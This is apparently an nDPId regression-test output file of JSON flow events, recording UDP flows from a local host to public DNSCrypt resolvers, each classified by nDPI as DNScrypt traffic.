-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348803,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":43540,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304627,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37950,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380805,"flow_last_seen":946739380844,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":40775,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317810,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43776,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396074,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54204,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318205,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49040,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400551,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":40209,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304399,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59641,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318167,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":51935,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":49186,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":43748,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317822,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52069,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":39007,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312400,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":55896,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318200,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49115,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337076,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":45375,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396071,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54305,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317461,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":55046,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304362,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":53697,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311314,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38278,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396109,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":38242,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402187,"flow_last_seen":946739402352,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":59587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":41800,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318171,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":54096,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312103,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":52911,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348800,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":45815,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":36676,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396073,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48237,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311310,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38349,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58104,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304361,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":37413,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317463,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":49008,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305189,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":50335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348912,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":41895,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305220,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":53811,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396071,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48300,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400520,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":54920,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337077,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":55768,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305384,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":57465,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400518,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":56988,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
